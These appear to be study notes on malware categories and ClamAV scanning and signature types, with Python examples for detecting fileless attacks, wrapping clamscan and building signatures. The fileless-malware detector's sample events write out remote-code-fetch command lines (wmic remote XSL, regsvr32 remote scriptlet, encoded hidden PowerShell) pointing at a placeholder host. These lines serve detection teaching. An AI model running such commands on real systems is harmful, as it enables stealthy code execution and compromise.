8. Explain in detail about malware classification.

Malware Classification:
Malware, short for malicious software, refers to any software intentionally designed to cause damage, steal
data, or gain unauthorized access to computer systems or networks. Malware can take various forms and
exhibit different behaviors, leading to the classification of malware into several categories. Here are some
common classifications of malware:
1. Ransomware
Ransomware is software that uses encryption to disable a target's access to its data until a ransom is paid.
The victim organization is rendered partially or totally unable to operate until it pays, but there is no
guarantee that payment will result in the necessary decryption key or that the decryption key provided will
function properly. (Figure not reproduced here: example of a ransom note.)
Ransomware Example:
This year, the city of Baltimore was hit by a type of ransomware named RobbinHood, which halted all
city activities, including tax collection, property transfers, and government email for weeks. This attack
has cost the city more than $18 million so far, and costs continue to accrue. The same type of malware was
used against the city of Atlanta in 2018, resulting in costs of $17 million.
2. Fileless Malware

Fileless malware does not drop its own executable on disk. Instead it abuses legitimate tools that
are already part of the operating system, such as PowerShell or WMI, and keeps its payload in
memory. Because the processes involved are trusted, signed OS components, a file-based antivirus
scan has little to match against; such attacks are stealthy and have been reported to be up to ten
times as likely to succeed as traditional, file-based malware attacks.

Fileless Malware Example:

Astaroth is a fileless malware campaign that spammed users with links to a .LNK shortcut file.
When a user opened the shortcut, the WMIC tool was launched, along with a number of other
legitimate Windows tools. These tools downloaded additional code that was executed only in
memory, leaving no malicious file on disk for a file-based antivirus scanner to find. The attackers
then downloaded and ran a Trojan that stole credentials and uploaded them to a remote server.
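The Astaroth chain described above leaves no file for a scanner, but it does leave process-creation telemetry, and that is where fileless activity is usually caught. The following Python is an added example, not code from these notes or from any vendor: it runs a handful of living-off-the-land heuristics over constructed Sysmon-style process-creation records (parent image, image, command line). The field names, the rule set and every sample event are assumptions made for illustration; a real deployment would feed it Sysmon Event ID 1 or EDR data and tune the rules against its own baseline.

```python
"""Heuristics for living-off-the-land ("fileless") process chains.

Added example, not part of the original notes. The event records below are
constructed to resemble Sysmon Event ID 1 (process creation) fields; the rule
set is illustrative, not any vendor's detection logic.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the new process
    command_line: str   # command line of the new process


def exe_name(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Built-in Windows binaries routinely abused to fetch and run code in memory.
LOLBINS = {
    "wmic.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe",
    "bitsadmin.exe", "powershell.exe", "cscript.exe", "wscript.exe",
}
URL = re.compile(r"https?://", re.I)

# Each rule is a predicate over one event (assumed, illustrative patterns).
RULES = {
    # wmic ... /format:"http://host/x.xsl" fetches a remote XSL and runs the script inside it
    "wmic_remote_xsl": lambda e: exe_name(e.image) == "wmic.exe"
        and re.search(r"/format\s*:\s*[\"']?\s*https?://", e.command_line, re.I) is not None,
    # regsvr32 /i:http://... scrobj.dll executes a remote scriptlet ("Squiblydoo")
    "regsvr32_remote_scriptlet": lambda e: exe_name(e.image) == "regsvr32.exe"
        and "scrobj.dll" in e.command_line.lower()
        and re.search(r"/i\s*:\s*[\"']?\s*https?://", e.command_line, re.I) is not None,
    # powershell -e / -enc / -EncodedCommand followed by a long base64 blob
    "powershell_encoded_command": lambda e: exe_name(e.image) == "powershell.exe"
        and re.search(r"(^|\s)-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
                      e.command_line, re.I) is not None,
    # the user double-clicked something (explorer.exe parent) and a LOLBin immediately hit a URL
    "explorer_spawns_lolbin_with_url": lambda e: exe_name(e.parent_image) == "explorer.exe"
        and exe_name(e.image) in LOLBINS
        and URL.search(e.command_line) is not None,
}


def detect(events):
    """Return {event_index: [rule names]} for every event that trips at least one rule."""
    hits = {}
    for idx, ev in enumerate(events):
        names = sorted(name for name, rule in RULES.items() if rule(ev))
        if names:
            hits[idx] = names
    return hits


# Constructed sample telemetry: one Astaroth-like chain mixed with benign activity.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\wbem\WMIC.exe",
              'wmic os get /format:"https://example.invalid/payload.xsl"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wbem\WMIC.exe",
              "wmic os get caption"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\Microsoft Office\WINWORD.EXE",
              '"WINWORD.EXE" /n report.docx'),
    ProcEvent(r"C:\Windows\System32\wbem\WMIC.exe", r"C:\Windows\System32\regsvr32.exe",
              "regsvr32.exe /s /n /u /i:https://example.invalid/a.sct scrobj.dll"),
]

if __name__ == "__main__":
    for idx, names in detect(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(names)}  <- {SAMPLE_EVENTS[idx].command_line}")
```

The benign WMIC query and the Word document in the sample pass cleanly; the remote-XSL, encoded-PowerShell and remote-scriptlet events are flagged even though none of them wrote a malicious file. Parent/child relationships matter as much as command lines: the same wmic.exe binary is benign under cmd.exe and suspicious when explorer.exe spawns it straight from a shortcut.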

3. Spyware

Spyware collects information about a user's activities without their knowledge or consent,
including passwords, PINs, payment information and private messages.
Spyware is not limited to the desktop browser: it can run inside a business-critical application or
on a mobile phone.
Even when the stolen data is not critical, the effects of spyware ripple through the organization as
system performance degrades and productivity is lost.

Spyware Example:
DarkHotel targeted business and government leaders through hotel Wi-Fi, using several types of
malware to gain access to the systems of specific high-value individuals. Once that access was
gained, the attackers installed keyloggers to capture their targets' passwords and other sensitive
information.
4. Adware

Adware tracks a user's browsing activity to decide which advertisements to serve. Although it is
similar to spyware, adware usually arrives bundled with another installer or as a browser extension
rather than as a hidden system-level implant, and it does not capture keystrokes.

The danger in adware is the erosion of the user's privacy: the data it collects is collated with data
gathered, overtly or covertly, about the user's activity elsewhere on the Internet to build a profile
of that person, including who their friends are, what they have purchased and where they have
travelled. That profile can be shared or sold to advertisers without the user's consent.
Adware Example:
Adware called Fireball infected 250 million computers and devices in 2017, hijacking browsers to
change default search engines and track web activity. The malware had the potential to become
more than a nuisance: it was capable of running arbitrary code on the victim machine and
downloading further malicious files.
5. Trojan
A Trojan disguises itself as desirable code or software. Once installed by an unsuspecting user, the
Trojan can hand control of the system to the attacker. Trojans may hide in games, apps or even
software patches, or be embedded in attachments to phishing e-mails.

Trojan Example:
Emotet began in 2014 as a banking trojan and later evolved into a loader that delivers other
malware. It is hard to fight because it evades signature-based detection, is persistent, and includes
spreader modules that help it propagate. The trojan was widespread enough to be the subject of a
US Department of Homeland Security alert, which notes that Emotet has cost state, local, tribal
and territorial governments up to $1 million per incident to remediate.
TrickBot is a banking Trojan first seen in 2016 that has since evolved into modular, multi-stage
malware capable of a wide variety of illicit operations.

6. Worms
A worm is self-replicating malware that spreads across a network without user interaction,
typically by exploiting vulnerabilities in operating systems or network services. Worms may gain
entry in several ways: through backdoors built into software, through unintentional software
vulnerabilities, or through removable media such as flash drives. Once in place, they can be used
to launch DDoS attacks, steal sensitive data or deliver ransomware.

Worm Example:
Stuxnet was probably developed by US and Israeli intelligence agencies with the intent of setting
back Iran's nuclear programme. Because the target network was air-gapped, it was introduced on a
flash drive, and its creators apparently never expected it to escape that network. It did. Once in the
wild, Stuxnet spread aggressively but did little damage, because its only payload was to interfere
with the specific industrial controllers that managed uranium enrichment.

7. Virus
A virus is a piece of code that attaches itself to a host program or document and executes when
that host is run, copying itself into other files as it goes; unlike a worm, it needs a host and usually
some user action to spread. Once inside a network, a virus may be used to steal sensitive data,
launch DDoS attacks or deliver ransomware.
8. Rootkits

A rootkit's defining purpose is concealment: it hides processes, files, network connections or other
malware from the operating system and its security tools, usually while giving the attacker
persistent, privileged remote control of the machine. Rootkits can operate at the application,
kernel, hypervisor or firmware level. They spread through phishing, malicious attachments,
malicious downloads and compromised shared drives, and are often used to conceal other
malware, such as keyloggers.
Rootkit Example:
Zacinlo infects systems when users download a fake VPN app. Once installed, Zacinlo sweeps the
system for competing malware and tries to remove it. It then opens invisible browsers and interacts
with content the way a human would, scrolling, highlighting and clicking, to fool behavioural
analysis software. Zacinlo's payload is advertising click fraud: the malware clicks on ads in those
invisible browsers and the operators collect a share of the commission.
9. Keyloggers
A keylogger is a type of spyware that records user input. Keyloggers have legitimate uses:
businesses may use them to monitor employee activity, and families to keep track of children's
online behaviour.
When installed for malicious purposes, however, keyloggers steal passwords, banking details and
other sensitive information. They are delivered through phishing, social engineering or malicious
downloads.
Keylogger Example:
A keylogger called Olympic Vision has been used against US, Middle Eastern and Asian
businessmen in business e-mail compromise (BEC) attacks. Olympic Vision is delivered by
spear-phishing and social engineering, and is used to steal sensitive data and spy on business
transactions. The keylogger is not sophisticated, but it sells on the black market for about $25, so
it is highly accessible to malicious actors.

10. Bots/Botnets

A bot is a software application that performs automated tasks on command. Bots have legitimate
uses, such as crawling the web for search engines, but malicious bots are self-propagating malware
that connects back to a central command-and-control server.

Bots are usually deployed in large numbers to form a botnet, a network of compromised machines
used to launch broad, remotely controlled attacks such as DDoS floods. Botnets can become very
large: the Mirai IoT botnet, for example, ranged from 800,000 to 2.5 million infected devices.

Botnet Example:
Echobot is a variant of the well-known Mirai. It attacks a wide range of IoT devices, exploiting
more than 50 different vulnerabilities, and also carries exploits for Oracle WebLogic Server and
VMware's SD-WAN networking software. In addition, the malware looks for unpatched legacy
systems. Echobot could be used to launch DDoS attacks, interrupt supply chains, steal sensitive
supply-chain information and conduct corporate sabotage.

9. What is ClamAV? Explain its role in malware analysis.

ClamAV is an open-source antivirus engine for detecting malicious software, including viruses,
trojans and other threats. It runs on Unix, Linux, macOS and Windows. Originally written by
Tomasz Kojm in 2001 and now maintained by Cisco Talos, ClamAV has become a widely used tool
for both individual users and enterprises, and is common on mail gateways and file servers.

ClamAV works by scanning files and directories for signatures that match known malware. A
signature is a fingerprint of a specific malware strain: a file hash, a byte pattern, or a logical
combination of patterns. When ClamAV processes a file, it compares the file's content against its
signature database. If a match is found it reports the signature name, and the user (or a wrapper
script) can then quarantine or delete the file.
Beyond exact hash matches, ClamAV supports pattern and logical signatures with wildcards,
bytecode signatures, and some heuristics (for example, detection of potentially unwanted
applications and of malformed or suspicious file structures). These give it some ability to catch
variants of known families, but it remains a signature-driven engine and should not be relied on to
detect genuinely new ("zero-day") or custom-built threats.

In malware analysis, ClamAV is one component of a broader toolkit. Analysts use it to quickly
triage suspicious files or directories for known malware and to obtain a baseline classification.
Because any antivirus engine will miss some samples, it is used alongside other tools and
techniques, such as sandboxing, static and dynamic analysis, and behavioural analysis, to fully
understand the nature of a sample.

Role in Malware Analysis:

Detection: ClamAV identifies malicious files by comparing them against a database of known
malware signatures.
On-Access Scanning: with the clamd daemon and clamonacc (on Linux), ClamAV can scan files as
they are opened and block access until the scan completes.
Scanning Archives: it unpacks and examines files inside compressed archives (ZIP, RAR, 7-Zip and
others), so malware hidden in an archive is still inspected.
Executable File Parsing: ClamAV parses Windows PE files (32/64-bit), ELF and Mach-O
executables, and can unpack several common executable packers.
Support for Special Files: it handles formats such as Microsoft Office documents, PDF, HTML and
SymbianOS packages.
Malware Prevention: ClamAV is widely deployed on mail gateways and file servers to stop malware
spreading through e-mail and file transfers.

10. Explain some basic ClamAV commands and their usage. Explain different types of
signatures.

1. Install ClamAV:
• If ClamAV is not already installed, install it with your package manager. On Ubuntu or
Debian-based systems:
    sudo apt-get install clamav
• Follow the prompts to complete the installation.
2. Update Virus Definitions:
• Before scanning, make sure the signature database is current. Update it with freshclam:
    sudo freshclam
• This downloads the latest main, daily and bytecode databases. On Debian/Ubuntu the
clamav-freshclam service may already be running in the background; if freshclam reports that
its log file is locked by another process, stop that service first or simply rely on it.
3. Perform a Scan:
• Once the database is updated, scan a file, a directory or the whole system. To scan a
directory (replace /path/to/directory with the actual path):
    clamscan -r /path/to/directory
Without -r, clamscan only looks at the files directly inside the directory and skips
subdirectories.
• ClamAV scans the target and prints one line per file followed by a summary.
4. View Scan Report:
• After the scan, ClamAV prints the results, including any detected malware, to the
terminal. To keep the report, redirect the output to a file or use --log:
    clamscan -r /path/to/directory > scan_report.txt
    clamscan -r --log=/var/log/clamav/scan.log /path/to/directory
• The exit code tells a script what happened: 0 means nothing was found, 1 means at least
one infected file was found, and 2 means an error occurred.
5. Scan Options:
clamscan has many options to customize a scan, for example -r (recurse into
subdirectories), -i or --infected (print only infected files), --exclude and --exclude-dir
(regular expressions for paths to skip), --move=DIR (quarantine infected files) and --remove
(delete them). Run clamscan --help or see the ClamAV documentation for the full list.
6. Schedule Regular Scans:
• For ongoing protection, schedule scans with cron or another scheduler. For example, a cron
job can run a recursive scan daily or weekly and mail the report to the administrator.
That completes a basic tour of ClamAV commands. Keep the signature database updated and
scan regularly to maintain a secure system.
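Steps 3 to 6 above are what a scheduled scan has to automate: run clamscan recursively, parse the report, and act on the exit code rather than on eyeballing output. The following Python is an added example, not code from these notes or from the ClamAV project. It wraps clamscan when it is installed, and its parser and verdict logic are exercised on a constructed block of text in clamscan's output format, so the example runs even on a machine without ClamAV. The sample paths, signature name and summary figures are assumptions.

```python
"""Wrapper around clamscan: run a recursive scan, parse its report, map exit codes.

Added example, not part of the original notes or of ClamAV itself. The sample
report text below is constructed to look like clamscan output so the parser can
be exercised without ClamAV installed.
"""
import re
import shutil
import subprocess
from dataclasses import dataclass, field

# clamscan exit codes, as documented in clamscan(1).
RC_CLEAN, RC_INFECTED, RC_ERROR = 0, 1, 2

FOUND_LINE = re.compile(r"^(?P<path>.+): (?P<sig>\S+) FOUND$")
SUMMARY_HEADER = "SCAN SUMMARY"
SUMMARY_LINE = re.compile(r"^(?P<key>[A-Za-z ]+): (?P<value>.+)$")


@dataclass
class ScanReport:
    hits: dict = field(default_factory=dict)      # path -> signature name
    summary: dict = field(default_factory=dict)   # "Infected files" -> "1", ...


def parse_clamscan_output(text: str) -> ScanReport:
    """Extract 'path: Signature FOUND' lines and the trailing summary block."""
    report = ScanReport()
    in_summary = False
    for line in text.splitlines():
        line = line.rstrip()
        if SUMMARY_HEADER in line:
            in_summary = True
            continue
        if in_summary:
            m = SUMMARY_LINE.match(line)
            if m:
                report.summary[m["key"].strip()] = m["value"].strip()
            continue
        m = FOUND_LINE.match(line)
        if m:
            report.hits[m["path"]] = m["sig"]
    return report


def verdict(returncode: int, report: ScanReport) -> str:
    """Turn clamscan's exit code (plus parsed hits) into one word a scheduler can act on."""
    if returncode == RC_ERROR:
        return "error"
    if returncode == RC_INFECTED or report.hits:
        return "infected"
    if returncode == RC_CLEAN:
        return "clean"
    return "error"  # any other code (signal, crash): treat as failure, never as clean


def run_scan(target: str):
    """Run 'clamscan -r --infected TARGET'. Returns (verdict, report), or None if clamscan is absent."""
    clamscan = shutil.which("clamscan")
    if clamscan is None:
        return None
    proc = subprocess.run([clamscan, "-r", "--infected", target],
                          capture_output=True, text=True, check=False)
    report = parse_clamscan_output(proc.stdout)
    return verdict(proc.returncode, report), report


# Constructed sample output in clamscan's format (without --infected, so OK lines appear too).
SAMPLE_OUTPUT = """\
/srv/samples/eicar.com: Win.Test.EICAR_HDB-1 FOUND
/srv/samples/readme.txt: OK
/srv/samples/tool.exe: OK

----------- SCAN SUMMARY -----------
Known viruses: 8694142
Engine version: 1.0.1
Scanned directories: 1
Scanned files: 3
Infected files: 1
Data scanned: 0.01 MB
Data read: 0.00 MB (ratio 0.00:1)
Time: 12.345 sec (0 m 12 s)
"""

if __name__ == "__main__":
    rep = parse_clamscan_output(SAMPLE_OUTPUT)
    print(verdict(RC_INFECTED, rep), rep.hits, rep.summary.get("Infected files"))
```

A cron job would call run_scan on the directory to protect and mail the report whenever the verdict is not "clean". The verdict function deliberately refuses to report "clean" on an unexpected exit code, and it also reports "infected" if FOUND lines appear even when the exit code says otherwise, so a wrapper that loses the exit code through a pipeline still fails safe.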

Types of Signatures:
Hash Signatures (MD5): these match the MD5 hash of a whole file and live in .hdb files, one line
per sample in the form hash:filesize:MalwareName. They identify exact copies of a known sample,
but a change to a single byte defeats them.
SHA-1 and SHA-256 Signatures: the same idea using stronger hash functions, stored in .hsb files
with the same hash:filesize:MalwareName layout. ClamAV can also hash only the PE sections of an
executable (.mdb/.msb files), which survives changes elsewhere in the file.
Body-Based and Logical Signatures: .ndb signatures match a hexadecimal byte pattern, with
wildcards such as ?? for any single byte and {n-m} for a gap of n to m bytes, at a given offset or
anywhere in the file; .ldb logical signatures combine several such patterns with a boolean
expression, so one signature can cover a whole family.
YARA Signatures: ClamAV also loads a subset of YARA rules (.yar/.yara files), which are more
flexible and expressive than plain hash signatures and let analysts describe malware by strings,
byte sequences and conditions over file properties.
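To make the difference between hash and body signatures concrete, the following Python is an added example, not code from these notes or from ClamAV: it builds .hdb/.hsb/.ndb-format lines for a sample and shows that a one-byte change breaks the hash signature while a body signature still matches. The sample is the EICAR test string (harmless by design, and detected by ClamAV as Win.Test.EICAR_HDB-1); the matcher implements only a subset of ClamAV's hex-signature syntax (plain hex bytes, ?? single-byte wildcards, * and {n-m} gaps), and the signature names are made up.

```python
"""Build ClamAV-style hash and body signatures and show what each survives.

Added example, not part of the original notes or of ClamAV. The sample is the
EICAR test string, which is harmless by design; the hex-signature matcher covers
only a subset of ClamAV's body-signature syntax.
"""
import hashlib
import re

# EICAR anti-malware test file (68 bytes). Stands in for a malware sample here.
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"


def hash_signature(data: bytes, name: str, algo: str = "md5") -> str:
    """One line in ClamAV's .hdb (md5) / .hsb (sha1, sha256) format: hash:filesize:MalwareName."""
    if algo not in ("md5", "sha1", "sha256"):
        raise ValueError("ClamAV hash signatures use md5, sha1 or sha256")
    return f"{hashlib.new(algo, data).hexdigest()}:{len(data)}:{name}"


def ndb_signature(name: str, hexsig: str, target_type: int = 0, offset: str = "*") -> str:
    """One line in .ndb format: MalwareName:TargetType:Offset:HexSignature (0 = any file, * = any offset)."""
    return f"{name}:{target_type}:{offset}:{hexsig}"


def hex_sig_to_regex(hexsig: str):
    """Translate a subset of ClamAV hex body-signature syntax into a compiled bytes regex."""
    parts = []
    i = 0
    while i < len(hexsig):
        if hexsig[i] == "*":                      # any number of bytes
            parts.append(b".*?")
            i += 1
        elif hexsig[i] == "{":                    # {n}, {n-m}, {n-}, {-m}
            j = hexsig.index("}", i)
            lo, dash, hi = hexsig[i + 1:j].partition("-")
            if not dash:
                parts.append(f".{{{int(lo)}}}".encode())
            else:
                parts.append(f".{{{lo or '0'},{hi}}}".encode())
            i = j + 1
        elif hexsig[i:i + 2] == "??":             # exactly one arbitrary byte
            parts.append(b".")
            i += 2
        else:                                     # a literal byte given as two hex digits
            pair = hexsig[i:i + 2]
            if not re.fullmatch(r"[0-9a-fA-F]{2}", pair):
                raise ValueError(f"bad hex token at {i}: {pair!r}")
            parts.append(re.escape(bytes([int(pair, 16)])))
            i += 2
    return re.compile(b"".join(parts), re.DOTALL)


def body_matches(hexsig: str, data: bytes) -> bool:
    """True if the hex body signature occurs anywhere in data (offset '*')."""
    return hex_sig_to_regex(hexsig).search(data) is not None


# A body signature on the fixed marker string inside EICAR, and a mutated copy of the
# sample with one byte changed near the end (constructed to mimic a trivial variant).
BODY_SIG = b"$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!".hex()
MUTATED = EICAR.replace(b"H+H*", b"H+H!")

if __name__ == "__main__":
    print(hash_signature(EICAR, "Eicar-Test-Signature"))
    print(ndb_signature("Eicar-Test-Signature", BODY_SIG))
    print("hash sig survives mutation:", hash_signature(MUTATED, "x") == hash_signature(EICAR, "x"))
    print("body sig survives mutation:", body_matches(BODY_SIG, MUTATED))
```

Writing the first line to a file named test.hdb and running clamscan -d test.hdb against a copy of the EICAR string reproduces the detection; doing the same with the mutated copy shows the hash line missing it while the .ndb line still fires. This is why hash signatures are cheap to generate but only useful against exact copies, and why family detection relies on body and logical signatures.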
